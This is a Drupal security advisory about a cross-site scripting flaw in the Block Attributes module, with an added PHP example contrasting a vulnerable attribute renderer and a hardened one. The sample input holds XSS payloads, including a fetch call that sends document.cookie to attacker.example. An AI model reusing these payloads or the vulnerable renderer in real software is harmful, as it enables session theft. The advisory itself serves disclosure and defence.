[Security-news] Block Attributes - Moderately critical - Cross-site Scripting - SA-CONTRIB-2025-090
security-news at drupal.org
Wed Jul 16 16:46:27 UTC 2025
View online: https://www.drupal.org/sa-contrib-2025-090
Project: Block Attributes [1]
Date: 2025-July-16
Security risk: *Moderately critical* 14 ∕ 25
AC:Basic/A:User/CI:Some/II:Some/E:Theoretical/TD:All [2]
Vulnerability: Cross-site Scripting
Affected versions: <1.1.0 || >=2.0.0 <2.0.1
CVE IDs: CVE-2025-7715
Description:
This module allows you to define custom HTML attributes for a block: you
enter an attribute name on the block configuration form and it is added to
the block's markup in a predefined format.
The module does not sufficiently validate the provided attribute names, so
JavaScript event-handler attributes such as onmouseover, onkeyup, etc. can
be added to a block. Such attributes execute JavaScript in the browser of
any user who views the rendered block, which is a cross-site scripting (XSS)
vulnerability.
This vulnerability is partially mitigated by the fact that an attacker must
first create the attribute and then manually add the specific attribute name
and the corresponding JavaScript code through the block's form.
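As an added example (not code from the Block Attributes module, and not the fix the maintainers shipped, which this advisory does not detail), the following PHP shows a naive attribute renderer that reproduces the flaw described above, beside a hardened renderer that validates attribute names and URL-bearing values before emitting them. Function names, the rejection rules and the sample input are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example; not code from the Block Attributes module. Function names,
// the rejection rules and the sample input below are assumptions.

/**
 * Vulnerable pattern (assumed, mirroring the advisory): attribute values are
 * escaped, but attribute names are emitted exactly as the user typed them, so
 * a name such as "onmouseover" becomes a live event handler.
 */
function renderBlockAttributesVulnerable(array $attributes): string
{
    $out = '';
    foreach ($attributes as $name => $value) {
        $out .= ' ' . $name . '="'
            . htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '"';
    }
    return '<div class="block"' . $out . '></div>';
}

/**
 * Returns null if the attribute name is acceptable, otherwise the reason it
 * was rejected. Rules: plain HTML attribute syntax only, no on* event
 * handlers (case-insensitive), and none of the attributes that can carry
 * executable content without being an event handler.
 */
function validateAttributeName(string $name): ?string
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_:-]*$/', $name)) {
        return 'attribute name contains characters outside [A-Za-z0-9_:-]';
    }
    $lower = strtolower($name);
    if (str_starts_with($lower, 'on')) {           // PHP 8+
        return 'event handler attributes (on*) are not allowed';
    }
    if (in_array($lower, ['style', 'srcdoc'], true)) {
        return "attribute \"$lower\" can carry executable content";
    }
    return null;
}

/** Attributes whose value is a URL and must therefore not use a script scheme. */
const URL_ATTRIBUTES = ['href', 'src', 'action', 'formaction', 'xlink:href', 'data'];

/** Returns null if the value is acceptable for this attribute, else a reason. */
function validateAttributeValue(string $name, string $value): ?string
{
    if (in_array(strtolower($name), URL_ATTRIBUTES, true)) {
        // Browsers tolerate whitespace and control characters inside a scheme
        // ("java\tscript:"), so strip them before comparing.
        $scheme = strtolower(preg_replace('/[\s\x00-\x1F]+/', '', $value));
        if (preg_match('/^(javascript|vbscript|data):/', $scheme)) {
            return "attribute \"$name\" uses a forbidden URL scheme";
        }
    }
    return null;
}

/** Hardened renderer: rejected attributes are dropped and reported to the caller. */
function renderBlockAttributesHardened(array $attributes, array &$rejected = []): string
{
    $out = '';
    foreach ($attributes as $name => $value) {
        $name = (string) $name;
        $value = (string) $value;
        $reason = validateAttributeName($name) ?? validateAttributeValue($name, $value);
        if ($reason !== null) {
            $rejected[$name] = $reason;
            continue;
        }
        $out .= ' ' . $name . '="'
            . htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '"';
    }
    return '<div class="block"' . $out . '></div>';
}

// Constructed sample input standing in for what a user could submit on the
// block configuration form.
$submitted = [
    'data-analytics' => 'hero',
    'title'          => 'Welcome "guest"',
    'onmouseover'    => 'alert(document.cookie)',
    'ONKEYUP'        => 'fetch("https://attacker.example/?c=" + document.cookie)',
    'href'           => " java\tscript:alert(1)",
];

echo renderBlockAttributesVulnerable($submitted), PHP_EOL;

$rejected = [];
echo renderBlockAttributesHardened($submitted, $rejected), PHP_EOL;
foreach ($rejected as $name => $reason) {
    echo "rejected $name: $reason", PHP_EOL;
}
```

Run it with `php` on the command line. The vulnerable renderer shows why escaping values alone is not enough: `alert(document.cookie)` contains nothing for htmlspecialchars() to escape, and the attribute name is what turns it into script. The same validateAttributeName() check can be run over attribute configuration that was stored before an upgrade, since this advisory does not say whether the fixed releases remove previously saved event-handler attributes.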
Solution:
Install the latest version:
* If you use the Block Attributes module for Drupal, upgrade to Block
Attributes 8.x-1.1 [3] or Block Attributes 2.0.1 [4].
Reported By:
* Pierre Rudloff (prudloff) [5] provisional member of the Drupal Security
Team
Fixed By:
* Kostia Bohach (_shy) [6]
Coordinated By:
* Greg Knaddison (greggles) [7] of the Drupal Security Team
* Juraj Nemec (poker10) [8] of the Drupal Security Team
* Pierre Rudloff (prudloff) [9], provisional member of the Drupal Security Team
* Jess (xjm) [10] of the Drupal Security Team
[1] https://www.drupal.org/project/block_attributes
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/block_attributes/releases/8.x-1.1
[4] https://www.drupal.org/project/block_attributes/releases/2.0.1
[5] https://www.drupal.org/u/prudloff
[6] https://www.drupal.org/u/_shy
[7] https://www.drupal.org/u/greggles
[8] https://www.drupal.org/u/poker10
[9] https://www.drupal.org/u/prudloff
[10] https://www.drupal.org/u/xjm